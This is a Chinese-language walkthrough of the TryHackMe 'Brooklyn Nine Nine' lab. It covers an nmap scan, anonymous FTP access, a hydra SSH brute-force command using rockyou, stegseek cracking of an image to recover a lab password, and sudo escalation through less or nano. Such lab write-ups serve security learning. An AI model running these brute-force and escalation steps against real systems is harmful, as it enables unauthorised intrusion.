[THM] Brooklyn Nine Nine

文章发布时间:

文章总字数:
664

[THM] Brooklyn Nine Nine

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
nmap -sV -sC -v 10.48.179.149
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.190.111
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

发现开放了三个端口,主要关注21的FTP服务,80端口的HTTP服务

方法一

21端口服务探测

FTP常见的利用就是匿名登录,找到一个note_to_jake.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 kali@kali  ~/Desktop  ftp 10.48.179.149 21
Connected to 10.48.179.149.
220 (vsFTPd 3.0.3)
Name (10.48.179.149:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||11944|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.
ftp>

读取内容,发现jake是弱密码,这里还有其他几个用户amy,holt

1
2
3
cat note_to_jake.txt 
From Amy,
Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

先使用hydra爆破jakessh密码,很容易找到jake的密码进行登录

1
hydra -l jake -P /usr/share/wordlists/rockyou.txt -vV -e ns 10.48.179.149 ssh

sudo权限提升

使用sudo -l查看权限,发现可以使用less

那么可以去GTFO找到提权命令,很容易就拿到root的shell

方法二

80端口服务探测

查看页面源代码,发现提示存在图片隐写,把背景图下载下来

可以使用steghide --extract -sf brooklyn99.jpg来提取中其中的文件,不过默认是设置了密码

这里使用stegseek来进行破解

1
2
3
4
5
6
stegseek brooklyn99.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "admin"
[i] Original filename: "note.txt".
[i] Extracting to "brooklyn99.jpg.out".

然后使用steghide再次提取出其中的note.txt

发现是提供的holt账户的ssh密码

1
2
3
4
5
cat note.txt 
Holts Password:
fluffydog12@ninenine

Enjoy!!

sudo权限提升

使用sudo -l发现可以使用nano

在GTFO中找到命令,获得root权限

总结

信息泄露 - ftp匿名登录

jpg的图片隐写

sudo提权